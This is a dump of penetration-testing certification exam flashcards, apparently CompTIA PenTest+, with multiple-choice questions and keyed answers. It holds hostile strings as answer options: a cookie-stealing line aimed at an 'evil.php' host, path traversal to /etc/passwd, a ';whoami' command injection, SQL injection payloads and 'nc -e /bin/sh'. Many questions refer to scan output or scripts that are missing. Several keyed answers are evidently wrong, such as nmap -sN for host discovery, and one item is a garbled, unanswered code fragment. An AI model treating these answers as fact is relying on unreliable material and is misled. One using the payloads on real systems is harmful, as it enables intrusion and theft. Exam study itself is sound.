Dump 2 Flashcards
A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
A.
CentOS
B.
Arch Linux
C.
Windows Server
D.
Ubuntu
Answer: C
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path
attack between the target and the server that has the FTP protocol. Which of the following
methods would be the BEST to accomplish this objective?
A.
Wait for the next login and perform a downgrade attack on the server.
B.
Capture traffic using Wireshark.
C.
Perform a brute-force attack over the server.
D.
Use an FTP exploit against the server.
Answer: B
Appending string values onto another string is called:
A.
compilation
B.
connection
C.
concatenation
D.
conjunction
Answer: C
A consultant is reviewing the following output after reports of intermittent connectivity issues:
Which of the following is MOST likely to be reported by the consultant?
A.
A device on the network has an IP address in the wrong subnet.
B.
A multicast session was initiated using the wrong multicast group.
C.
An ARP flooding attack is using the broadcast address to perform DDoS.
D.
A device on the network has poisoned the ARP cache.
Answer: D
Which of the following web-application security risks are part of the OWASP Top 10 v2017?
(Choose two.)
A.
Buffer overflows
B.
Cross-site scripting
C.
Race-condition attacks
D.
Zero-day attacks
E.
Injection flaws
F.
Ransomware attacks
Answer: B,E
The results of an Nmap scan are as follows:
Which of the following would be the BEST conclusion about this device?
A.
This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22
handle heartbeat extension packets, allowing attackers to obtain sensitive information from
process memory.
B.
This device is most likely a gateway with in-band management services.
C.
This device is most likely a proxy server forwarding requests over TCP/443.
D.
This device may be vulnerable to remote code execution because of a buffer overflow vulnerability
in the method used to extract DNS names from packets prior to DNSSEC validation.
Answer: B
When preparing for an engagement with an enterprise organization, which of the following is one
of the MOST important items to develop fully prior to beginning the penetration testing activities?
A.
Clarify the statement of work
B.
Obtain an asset inventory from the client
C.
Interview all stakeholders
D.
Identify all third parties involved.
Answer: A
A penetration tester is reviewing the following SOW prior to engaging with a client.
“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated
as client confidential. Upon completion of the engagement, the penetration tester will submit
findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and
subsequently dispose of all findings by erasing them in a secure manner.?
Based on the information in the SOW, which of the following behaviors would be considered
unethical? (Choose two.)
A.
Utilizing proprietary penetration-testing tools that are not available to the public or to the client for
auditing and inspection.
B.
Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of
the engagement.
C.
Failing to share with the client critical vulnerabilities that exist within the client architecture to
appease the client’s senior leadership team.
D.
Seeking help with the engagement in underground hacker forums by sharing the client’s public IP
address.
E.
Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop.
F.
Retaining the SOW within the penetration tester’s company for future use so the sales team can
plan future engagements.
Answer: C,D
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities
in network switches. However, the script is not working properly.
Which of the following changes should the tester apply to make the script work as intended?
A.
Change line 2 to $ip= “10.192.168.254?;
B.
Remove lines 3, 5, and 6.
C.
Remove line 6.
D.
Move all the lines below line 7 to the top of the script.
Answer: B
A penetration tester finds a PHP script used by a web application in an unprotected internal source
code repository. After reviewing the code, the tester identifies the following:
Which of the following combinations of tools would the penetration tester use to exploit this script?
A.
Hydra and crunch
B.
Netcat and cURL
C.
Burp Suite and DIRB
D.
Nmap and OWASP ZAP
Answer: B
A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot. Which of the following techniques would BEST support this
objective?
A.
Create a one-shot system service to establish a reverse shell.
B.
Obtain /etc/shadow and brute force the root password.
C.
Run the nc –e /bin/sh <…> command.
D.
Move laterally to create a user account on LDAP.
Answer: A
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a
Linux server and discovers the following data in a file named password.txt in the /home/svsacct
directory:
U3VQZXIkM2NyZXQhCg==
Which of the following commands should the tester use NEXT to decode the contents of the file?
A.
echo U3VQZXIkM2NyZXQhCg== | base64 –d
B.
tar zxvf password.txt
C.
hydra –l svsacct –p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D.
john –wordlist /usr/share/seclists/rockyou.txt password.txt
Answer: A
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The
test is confirmed to be on a known environment. Which of the following would be the BEST option
to identify a system properly prior to performing the assessment?
A.
Asset inventory
B.
DNS records
C.
Web-application scan
D.
Full scan
Answer: A
A security firm has been hired to perform an external penetration test against a company. The only
information the firm received was the company name. Which of the following passive
reconnaissance approaches would be MOST likely to yield positive initial results?
A.
Specially craft and deploy phishing emails to key company leaders.
B.
Run a vulnerability scan against the company’s external website.
C.
Runtime the company’s vendor/supply chain.
D.
Scrape web presences and social-networking sites.
Answer: D
A security firm is discussing the results of a penetration test with the client. Based on the findings,
the client wants to focus the remaining time on a critical network segment. Which of the following
BEST describes the action taking place?
A.
Maximizing the likelihood of finding vulnerabilities
B.
Reprioritizing the goals/objectives
C.
Eliminating the potential for false positives
D.
Reducing the risk to the client environment
Answer: B
Which of the following tools would be BEST suited to perform a manual web application security
assessment? (Choose two.)
A.
OWASP ZAP
B.
Nmap
C.
Nessus
D.
BeEF
E.
Hydra
F.
Burp Suite
Answer: A,F
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and
industrial control systems:
A.
will reveal vulnerabilities in the Modbus protocol
B.
may cause unintended failures in control systems
C.
may reduce the true positive rate of findings
D.
will create a denial-of-service condition on the IP networks
Answer: B
Which of the following provides a matrix of common tactics and techniques uses by attackers
along with recommended mitigations?
A.
NIST SP 800-53
B.
OWASP Top 10
C.
MITRE ATT&CK framework
D.
PTES technical guidelines
Answer: C
A security engineer identified a new server on the network and wants to scan the host to
determine if it is running an approved version of Linux and a patched version of Apache. Which of
the following commands will accomplish this task?
A.
nmap –f –sV –p80 192.168.1.20
B.
nmap –sS –sL –p80 192.168.1.20
C.
nmap –A –T4 –p80 192.168.1.20
D.
nmap –O –v –p80 192.168.1.20
Answer: C
A mail service company has hired a penetration tester to conduct an enumeration of all user
accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
A.
VRFY and EXPN
B.
VRFY and TURN
C.
EXPN and TURN
D.
RCPT TO and VRFY
Answer: A
A penetration tester is evaluating a company’s network perimeter. The tester has received limited
information about defensive controls or countermeasures, and limited internal knowledge of the
testing exists. Which of the following should be the FIRST step to plan the reconnaissance
activities?
A.
Launch an external scan of netblocks.
B.
Check WHOIS and netblock records for the company.
C.
Use DNS lookups and dig to determine the external hosts.
D.
Conduct a ping sweep of the company’s netblocks.
Answer: B
A penetration tester captured the following traffic during a web-application test:
Which of the following methods should the tester use to visualize the authorization information
being transmitted?
A.
Decode the authorization header using UTF-8.
B.
Decrypt the authorization header using bcrypt.
C.
Decode the authorization header using Base64.
D.
Decrypt the authorization header using AES.
Answer: C
A penetration tester was hired to perform a physical security assessment of an organization’s
office. After monitoring the environment for a few hours, the penetration tester notices that some
employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate
access into the organization’s building without raising too many alerts?
A.
Tailgating
B.
Dumpster diving
C.
Shoulder surfing
D.
Badge cloning
Answer: A
A penetration tester wants to find hidden information in documents available on the web at a
particular domain. Which of the following should the penetration tester use?
A.
Netcraft
B.
CentralOps
C.
Responder
D.
FOCA
Answer: D
A penetration tester has gained access to the Chief Executive Officer’s (CEO’s) internal, corporate
email. The next objective is to gain access to the network. Which of the following methods will
MOST likely work?
A.
Try to obtain the private key used for S/MIME from the CEO’s account.
B.
Send an email from the CEO’s account, requesting a new account.
C.
Move laterally from the mail server to the domain controller.
D.
Attempt to escalate privileges on the mail server to gain root access.
Answer: B
A penetration tester needs to perform a vulnerability scan against a web server. Which of the
following tools is the tester MOST likely to choose?
A.
Nmap
B.
Nikto
C.
Cain and Abel
D.
Ethercap
Answer: A
A penetration tester performed a full vulnerability scan on the target servers and noticed numerous
findings for one of the installed applications. The penetration tester found a working exploit that
lacks mitigation or work-around options. Which of the following should the penetration tester
consider?
A.
Network segmentation
B.
Application removal
C.
Patch management
D.
Password encryption
Answer: C
A penetration tester has been given an assignment to attack a series of targets in the
192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the
following Nmap scan syntaxes would BEST accomplish this objective?
A.
nmap –sT –vvv –O 192.168.1.0/24 –PO
B.
nmap –sV 192.168.1.0/24 –PO
C.
nmap –sA –v –O 192.168.1.0/24
D.
nmap –sS –O 192.168.1.0/24 –T1
Answer: D
A penetration tester is testing a new version of a mobile application in a sandbox environment. To
intercept and decrypt the traffic between the application and the external API, the tester has
created a private root CA and issued a certificate from it. Even though the tester installed the root
CA into the trusted stone of the smartphone used for the tests, the application shows an error
indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?
A.
TCP port 443 is not open on the firewall
B.
The API server is using SSL instead of TLS
C.
The tester is using an outdated version of the application
D.
The application has the API certificate pinned.
Answer: D
A software company has hired a penetration tester to perform a penetration test on a database
server. The tester has been given a variety of tools used by the company’s privacy policy. Which
of the following would be the BEST to use to find vulnerabilities on this server?
A.
OpenVAS
B.
Nikto
C.
SQLmap
D.
Nessus
Answer: D
A company is concerned that its cloud service provider is not adequately protecting the VMs
housing its software development. The VMs are housed in a datacenter, with other companies
sharing physical resources. Which of the following attack types is MOST concerning to the
company?
A.
Data flooding
B.
Session riding
C.
Cybersquatting
D.
Side channel
Answer: A
Which of the following concepts defines the specific set of steps and approaches that are
conducted during a penetration test?
A.
Scope details
B.
Findings
C.
Methodology
D.
Statement of work
Answer: C
A private investigation firm is requesting a penetration test to determine the likelihood that
attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of
the following is a social-engineering method that, if successful, would MOST likely enable both
objectives?
A.
Send an SMS with a spoofed service number including a link to download a malicious application.
B.
Exploit a vulnerability in the MDM and create a new account and device profile.
C.
Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.
D.
Infect a website that is often used by employees with malware targeted toward x86 architectures.
Answer: A
A penetration tester ran a ping –A command during an unknown environment test, and it returned
a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A.
Windows
B.
Apple
C.
Linux
D.
Android
Answer: A
A physical penetration tester needs to get inside an organization’s office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company’s ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom. Which of the following techniques can the tester
use to gain physical access to the office? (Choose two.)
A.
Shoulder surfing
B.
Call spoofing
C.
Badge stealing
D.
Tailgating
E.
Dumpster diving
F.
Email phishing
Answer: C,D
A penetration tester conducted an assessment on a web server. The logs from this session show
the following:
Which of the following attacks is being attempted?
A.
Clickjacking
B.
Session hijacking
C.
Parameter pollution
D.
Cookie hijacking
E.
Cross-site scripting
Answer: C
A new security firm is onboarding its first client. The client only allowed testing over the weekend
and needed the results Monday morning. However, the assessment team was not able to access
the environment as expected until Monday. Which of the following should the security company
have acquired BEFORE the start of the assessment?
A.
A signed statement of work
B.
The correct user accounts and associated passwords
C.
The expected time frame of the assessment
D.
The proper emergency contacts for the client
Answer: D
An Nmap scan of a network switch reveals the following:
Which of the following technical controls will most likely be the FIRST recommendation for this
device?
A.
Encrypted passwords
B.
System-hardening techniques
C.
Multifactor authentication
D.
Network segmentation
Answer: A
A penetration tester has obtained shell access to a Windows host and wants to run a specially
crafted binary for later execution using the ymic.exe process call create function. Which of the
following OS or filesystem mechanisms is MOST likely to support this objective?
A.
Alternate data streams
B.
PowerShell modules
C.
MP4 steganography
D.
ProcMon
Answer: B
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating
proprietary company information. The administrator offers to pay the tester to keep quiet. Which of
the following is the BEST action for the tester to take?
A.
Check the scoping document to determine if exfiltration is within scope.
B.
Stop the penetration test.
C.
Escalate the issue.
D.
Include the discovery and interaction in the daily report.
Answer: C
A Chief Information Security Officer wants to evaluate the security of the company’s e-commerce
application. Which of the following tools should a penetration tester use FIRST to obtain relevant
information from the application without triggering alarms?
A.
SQLmap
B.
DirBuster
C.
w3af
D.
OWASP ZAP
Answer: D
Which of the following documents must be signed between the penetration tester and the client to
govern how any provided information is managed before, during, and after the engagement?
A.
MSA
B.
NDA
C.
SOW
D.
ROE
Answer: C
A penetration tester runs a scan against a server and obtains the following output:
Which of the following command sequences should the penetration tester try NEXT?
A.
ftp 192.168.53.23
B.
smbclient \\WEB3\IPC$ -I 192.168.53.23 -U guest
C.
ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
D.
curl -X TRACE https://192.168.53.23:8443/index.aspx
Answer: C
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which
of the following commands would allow the tester to save the results in an interchangeable
format?
A.
nmap -iL results 192.168.0.10-100
B.
nmap 192.168.0.10-100 -O > results
C.
nmap -A 192.168.0.10-100 -oX results
D.
nmap 192.168.0.10-100 | grep “results”
Answer: C
During a penetration-testing engagement, a consultant performs reconnaissance of a client to
identify potential targets for a phishing campaign. Which of the following would allow the
consultant to retrieve email addresses for technical and billing contacts quickly, without triggering
any of the client’s cybersecurity tools? (Choose two.)
A.
Scraping social media sites
B.
Using the WHOIS lookup tool
C.
Crawling the client’s website
D.
Phishing company employees
E.
Utilizing DNS lookup tools
F.
Conducting wardriving near the client facility
Answer: A,B
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
A.
SOW.
B.
SLA.
C.
ROE.
D.
NDA
Answer: C
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A.
var adr = '../evil.php?test=' + escape(document.cookie);
B.
../../../../../../../../../../etc/passwd
C.
/var/www/html/index.php;whoami
D.
1 UNION SELECT 1, DATABASE (), 3 –
Answer: D
A penetration tester has established an on-path position between a target host and local network
services but has not been able to establish an on-path position between the target host and the
Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?
A.
Gain access to the target host and implant malware specially crafted for this purpose.
B.
Exploit the local DNS server and add/update the zone records with a spoofed A record.
C.
Use the Scapy utility to overwrite name resolution fields in the DNS query response.
D.
Proxy HTTP connections from the target host to that of the spoofed host.
Answer: B
Which of the following types of information would MOST likely be included in an application
security assessment report addressed to developers? (Choose two.)
A.
Use of non-optimized sort functions
B.
Poor input sanitization
C.
Null pointer dereferences
D.
Non-compliance with code style guide
E.
Use of deprecated Javadoc tags
F.
A cyclomatic complexity score of 3
Answer: B,C
A penetration tester has found indicators that a privileged user’s password might be the same on
30 different Linux systems. Which of the following tools can help the tester identify the number of
systems on which the password can be used?
A.
Hydra
B.
John the Ripper
C.
Cain and Abel
D.
Medusa
Answer: B
A penetration tester recently completed a review of the security of a core network device within a
corporate environment. The key findings are as follows:
Which of the following would be BEST to add to the recommendations section of the final report?
(Choose two.)
A.
Enforce enhanced password complexity requirements.
B.
Disable or upgrade SSH daemon.
C.
Disable HTTP/301 redirect configuration.
D.
Create an out-of-band network for management.
E.
Implement a better method for authentication.
F.
Eliminate network management and control interfaces.
Answer: D,E
A penetration tester was able to compromise a server and escalate privileges. Which of the
following should the tester perform AFTER concluding the activities on the specified target?
(Choose two.)
A.
Remove the logs from the server.
B.
Restore the server backup.
C.
Disable the running services.
D.
Remove any tools or scripts that were installed.
E.
Delete any created credentials.
F.
Reboot the target server.
Answer: D,E
A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from
dig:
…
;; ANSWER SECTION
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com.
comptia.org. 3569 IN A 3.219.13.186.
comptia.org. 3569 IN NS ns1.comptia.org.
comptia.org. 3569 IN SOA haven. administrator.comptia.org.
comptia.org. 3569 IN MX new.mx0.comptia.org.
comptia.org. 3569 IN MX new.mx1.comptia.org.
Which of the following potential issues can the penetration tester identify based on this output?
A.
At least one of the records is out of scope.
B.
There is a duplicate MX record.
C.
The NS record is not within the appropriate domain.
D.
The SOA records outside the comptia.org domain.
Answer: A
A consultant just performed a SYN scan of all the open ports on a remote host and now needs to
remotely identify the type of services that are running on the host. Which of the following is an
active reconnaissance tool that would be BEST to use to accomplish this task?
A.
tcpdump
B.
Snort
C.
Nmap
D.
Netstat
E.
Fuzzer
Answer: C
Deconfliction is necessary when the penetration test:
A.
determines that proprietary information is being stored in cleartext.
B.
occurs during the monthly vulnerability scanning.
C.
uncovers indicators of prior compromise over the course of the assessment.
D.
proceeds in parallel with a criminal digital forensic investigation.
Answer: D
A penetration tester wants to test a list of common passwords against the SSH daemon on a
network device. Which of the following tools would be BEST to use for this purpose?
A.
Hashcat
B.
Mimikatz
C.
Patator
D.
John the Ripper
Answer: C
PCI DSS requires which of the following as part of the penetration-testing process?
A.
The penetration tester must have cybersecurity certifications.
B.
The network must be segmented.
C.
Only externally facing systems should be tested.
D.
The assessment must be performed during non-working hours.
Answer: B
A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client. Which of the following happens NEXT?
A.
The penetration tester conducts a retest.
B.
The penetration tester deletes all scripts from the client machines.
C.
The client applies patches to the systems.
D.
The client clears system logs generated during the test.
Answer: C
A penetration tester is examining a Class C network to identify active systems quickly. Which of
the following commands should the penetration tester use?
A.
nmap –sn 192.168.0.1/16
B.
nmap –sn 192.168.0.1-254
C.
nmap –sn 192.168.0.1 192.168.0.1.254
D.
nmap –sN 192.168.0.0/24
Answer: D
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration
of data using email attachments. Which of the following techniques should the tester select to
accomplish this task?
A.
Steganography
B.
Metadata removal
C.
Encryption
D.
Encode64
Answer: A
A penetration tester received a 16-bit network block that was scoped for an assessment. During
the assessment, the tester realized no hosts were active in the provided block of IPs and reported
this to the company. The company then provided an updated block of IPs to the tester. Which of
the following would be the most appropriate NEXT step?
A.
Terminate the contract.
B.
Update the ROE with new signatures.
C.
Scan the 8-bit block to map additional missed hosts.
D.
Continue the assessment.
Answer: B
A penetration tester has completed an analysis of the various software products produced by the
company under assessment. The tester found that over the past several years the company has
been including vulnerable third-party modules in multiple products, even though the quality of the
organic code being developed is very good. Which of the following recommendations should the
penetration tester include in the report?
A.
Add a dependency checker into the tool chain.
B.
Perform routine static and dynamic analysis of committed code.
C.
Validate API security settings before deployment.
D.
Perform fuzz testing of compiled binaries.
Answer: A
A penetration tester needs to access a building that is guarded by locked gates, a security team,
and cameras. Which of the following is a technique the tester can use to gain access to the IT
framework without being detected?
A.
Pick a lock.
B.
Disable the cameras remotely.
C.
Impersonate a package delivery worker.
D.
Send a phishing email.
Answer: C
A penetration tester is assessing a wireless network. Although monitoring the correct channel and
SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the
following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A.
Key reinstallation
B.
Deauthentication
C.
Evil twin
D.
Replay
Answer: B
A penetration tester has gained access to part of an internal network and wants to exploit on a
different network segment. Using Scapy, the tester runs the following command:
Which of the following represents what the penetration tester is attempting to accomplish?
A.
DNS cache poisoning
B.
MAC spoofing
C.
ARP poisoning
D.
Double-tagging attack
Answer: D
A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence. Which of the following would
the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
A.
MX records
B.
Zone transfers
C.
DNS forward and reverse lookups
D.
Internet search engines
E.
Externally facing open ports
F.
Shodan results
Answer: D,F
The attacking machine is on the same LAN segment as the target host during an internal
penetration test. Which of the following commands will BEST enable the attacker to conduct host
discovery and write the discovery to files without returning results of the attack machine?
A.
nmap –sn –n –exclude 10.1.1.15 10.1.1.0/24 –oA target_txt
B.
nmap –iR 10 –n –oX out.xml | grep “Nmap? | cut –d “? –f5 > live-hosts.txt
C.
nmap –Pn –sV –O –iL target.txt –oA target_text_Service
D.
nmap –sS –Pn –n –iL target.txt –oA target_txtl
Answer: A
Using the output, identify potential attack vectors that should be further investigated.
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print(“%s:%s – OPEN? % (ip, port))
except socket.timeout
print(“%:%s – TIMEOUT? % (ip, port))
except socket.error as e:
print(“%:%s – CLOSED? % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)
A customer adds a requirement to the scope of a penetration test that states activities can only
occur during normal business hours. Which of the following BEST describes why this would be
necessary?
A.
To meet PCI DSS testing requirements
B.
For testing of the customer’s SLA with the ISP
C.
Because of concerns regarding bandwidth limitations
D.
To ensure someone is available if something goes wrong
Answer: D
An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following
scans will the assessor MOST likely run?
A.
nmap –sA 192.168.0.1/24
B.
nmap –sS 192.168.0.1/24
C.
nmap –oG 192.168.0.1/24
D.
nmap 192.168.0.1/24
Answer: B
During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as
soon as possible. The penetration tester did not agree with this request, and after testing began,
the tester discovered a vulnerability and gained internal access to the system. Additionally, this
scenario led to a loss of confidential credit card data and a hole in the system. At the end of the
test, the penetration tester willfully failed to report this information and left the vulnerability in place.
A few months later, the client was breached and credit card data was stolen. After being notified
about the breach, which of the following steps should the company take NEXT?
A.
Deny that the vulnerability existed
B.
Investigate the penetration tester.
C.
Accept that the client was right.
D.
Fire the penetration tester.
Answer: B
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While
conducting the assessment, the support organization of the rig reported issues connecting to
corporate applications and upstream services for data acquisitions. Which of the following is the
MOST likely culprit?
A.
Patch installations
B.
Successful exploits
C.
Application failures
D.
Bandwidth limitations
Answer: D
A penetration tester has identified several newly released CVEs on a VoIP call manager. The
scanning tool the tester used determined the possible presence of the CVEs based off the number
of the service. Which of the following methods would BEST support validation of the possible
findings?
A.
Manually check the version number of the VoIP service against the CVE release.
B.
Test with proof-of-concept code from an exploit database on a non-production system.
C.
Review SIP traffic from an on-path position to look for indicators of compromise.
D.
Execute an nmap -sV scan against the service.
Answer: A
The results of an Nmap scan are as follows:
Which of the following device types will MOST likely have a similar response?
A.
Active Directory domain controller
B.
IoT/embedded device
C.
Exposed RDP
D.
Print queue
Answer: B
Which of the following are the MOST important items for prioritizing fixes that should be included
in the final report for a penetration test? (Choose two.)
A.
The CVSS score of the finding
B.
The network location of the vulnerable device
C.
The vulnerability identifier
D.
The client acceptance form
E.
The name of the person who found the flaw
F.
The tool used to find the issue
Answer: A,C
User credentials were captured from a database during an assessment and cracked using rainbow
tables. Based on the ease of compromise, which of the following algorithms was MOST likely used
to store the passwords in the database?
A.
MD5
B.
bcrypt
C.
SHA-1
D.
PBKDF2
Answer: A
A penetration tester is testing a web application that is hosted by a public cloud provider. The
tester is able to query the provider’s metadata and get the credentials used by the instance to
authenticate itself. Which of the following vulnerabilities has the tester exploited?
A.
Cross-site request forgery
B.
Server-side request forgery
C.
Remote file inclusion
D.
Local code inclusion
Answer: B
A penetration tester was contracted to test a proprietary application for buffer overflow
vulnerabilities. Which of the following tools would be BEST suited for this task?
A.
GDB
B.
Burp Suite
C.
SearchSpliot
D.
Netcat
Answer: A
Which of the following would assist a penetration tester the MOST when evaluating the
susceptibility of top-level executives to social engineering attacks?
A.
Scraping social media for personal details
B.
Registering domain names that are similar to the target company’s
C.
Identifying technical contacts at the company
D.
Crawling the company’s website for company information
Answer: A
A penetration tester is testing a new API for the company’s existing services and is preparing the
following script:
Which of the following would the test discover?
A.
Default web configurations
B.
Open web ports on a host
C.
Supported HTTP methods
D.
Listening web servers in a domain
Answer: C
Given the following script:
Which of the following BEST characterizes the function performed by lines 5 and 6?
A.
Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10
B.
Performs a single DNS query for www.comptia.org and prints the raw data output
C.
Loops through variable b to count the results returned for the DNS query and prints that count to
screen
D.
Prints each DNS query result already stored in variable b
Answer: D
A penetration-testing team needs to test the security of electronic records in a company’s office.
Per the terms of engagement, the penetration test is to be conducted after hours and should not
include circumventing the alarm or performing destructive entry. During outside reconnaissance,
the team sees an open door from an adjoining building. Which of the following would be allowed
under the terms of the engagement?
A.
Prying the lock open on the records room
B.
Climbing in an open window of the adjoining building
C.
Presenting a false employee ID to the night guard
D.
Obstructing the motion sensors in the hallway of the records room
Answer: C
A penetration tester discovers during a recent test that an employee in the accounting department
had been making changes to a payment system and redirecting money into a personal bank
account. The penetration test was immediately stopped. Which of the following would be the BEST
recommendation to discourage this type of activity in the future?
A.
Enforce mandatory employee vacations.
B.
Implement multifactor authentication.
C.
Install video surveillance equipment in the office.
D.
Encrypt passwords for bank account information.
Answer: A
A penetration tester who is working remotely is conducting a penetration test using a wireless
connection. Which of the following is the BEST way to provide confidentiality for the client while
using this connection?
A.
Configure wireless access to use a AAA server.
B.
Use random MAC addresses on the penetration testing distribution.
C.
Install a host-based firewall on the penetration testing distribution.
D.
Connect to the penetration testing company’s VPS using a VPN.
Answer: D
A penetration tester is able to use a command injection vulnerability in a web application to get a
reverse shell on a system After running a few commands, the tester runs the following:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Which of the following actions Is the penetration tester performing?
A.
Privilege escalation
B.
Upgrading the shell
C.
Writing a script for persistence
D.
Building a bind shell
Answer: B
A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of
restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hardwired
connection available at their desks. Which of the following is the BEST method available to
pivot and gain additional access to the network?
A.
Set up a captive portal with embedded malicious code.
B.
Capture handshakes from wireless clients to crack.
C.
Span deauthentication packets to the wireless clients.
D.
Set up another access point and perform an evil twin attack.
Answer: D
A tester who is performing a penetration test discovers an older firewall that is known to have
serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the
engagement. Which of the following is the BEST option for the tester to take?
A.
Segment the firewall from the cloud.
B.
Scan the firewall for vulnerabilities.
C.
Notify the client about the firewall.
D.
Apply patches to the firewall.
Answer: C
A penetration tester is looking for vulnerabilities within a company’s web application that are in
scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?
A.
Blind SQL
B.
Boolean SQL
C.
Stacked queries
D.
Error-based
Answer: C
Which of the following can be used to store alphanumeric data that can be fed into scripts or
programs as input to penetration-testing tools?
A.
Dictionary
B.
Directory
C.
Symlink
D.
Catalog
E.
For-loop
Answer: A
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the
following commands should the penetration tester consider?
A.
inurl:
B.
link:
C.
site:
D.
intitle:
Answer: C
A client would like to have a penetration test performed that leverages a continuously updated
TTPs framework and covers a wide variety of enterprise systems and networks. Which of the
following methodologies should be used to BEST meet the client’s expectations?
A.
OWASP Top 10
B.
MITRE ATT&CK framework
C.
NIST Cybersecurity Framework
D.
The Diamond Model of Intrusion Analysis
Answer: B
During a web application test, a penetration tester was able to navigate to https://company.com
and view all links on the web page. After manually reviewing the pages, the tester used a web
scanner to automate the search for vulnerabilities. When returning to the web application, the
following message appeared in the browser: unauthorized to view this page. Which of the
following BEST explains what occurred?
A.
The SSL certificates were invalid.
B.
The tester IP was blocked.
C.
The scanner crashed the system.
D.
The web page was not found.
Answer: B
A red team completed an engagement and provided the following example in the report to
describe how the team gained access to a web server:
x’ OR role LIKE ‘%admin%
Which of the following should be recommended to remediate this vulnerability?
A.
Multifactor authentication
B.
Encrypted communications
C.
Secure software development life cycle
D.
Parameterized queries
Answer: D
The following output is from reconnaissance on a public-facing banking website:
Based on these results, which of the following attacks is MOST likely to succeed?
A.
A birthday attack on 64-bit ciphers (Sweet32)
B.
An attack that breaks RC4 encryption
C.
An attack on a session ticket extension (Ticketbleed)
D.
A Heartbleed attack
Answer: B
Which of the following documents is agreed upon by all parties associated with the penetrationtesting
engagement and defines the scope, contacts, costs, duration, and deliverables?
A.
SOW
B.
SLA
C.
MSA
D.
NDA
Answer: A
In Python socket programming, SOCK_DGRAM type is:
A.
reliable.
B.
matrixed.
C.
connectionless.
D.
slower.
Answer: C
Which of the following is the MOST important information to have on a penetration testing report
that is written for the developers?
A.
Executive summary
B.
Remediation
C.
Methodology
D.
Metrics and measures
Answer: B
After gaining access to a Linux system with a non-privileged account, a penetration tester
identifies the following file:
Which of the following actions should the tester perform FIRST?
A.
Change the file permissions.
B.
Use privilege escalation.
C.
Cover tracks.
D.
Start a reverse shell.
Answer: B
Which of the following types of assessments MOST likely focuses on vulnerabilities with the
objective to access specific data?
A.
An unknown-environment assessment
B.
A known-environment assessment
C.
A red-team assessment
D.
A compliance-based assessment
Answer: C
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as
permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and
immediately stopped the transfer. Which of the following MOST likely explains the penetration
tester’s decision?
A.
The tester had the situational awareness to stop the transfer.
B.
The tester found evidence of prior compromise within the data set.
C.
The tester completed the assigned part of the assessment workflow.
D.
The tester reached the end of the assessment time frame.
Answer: A
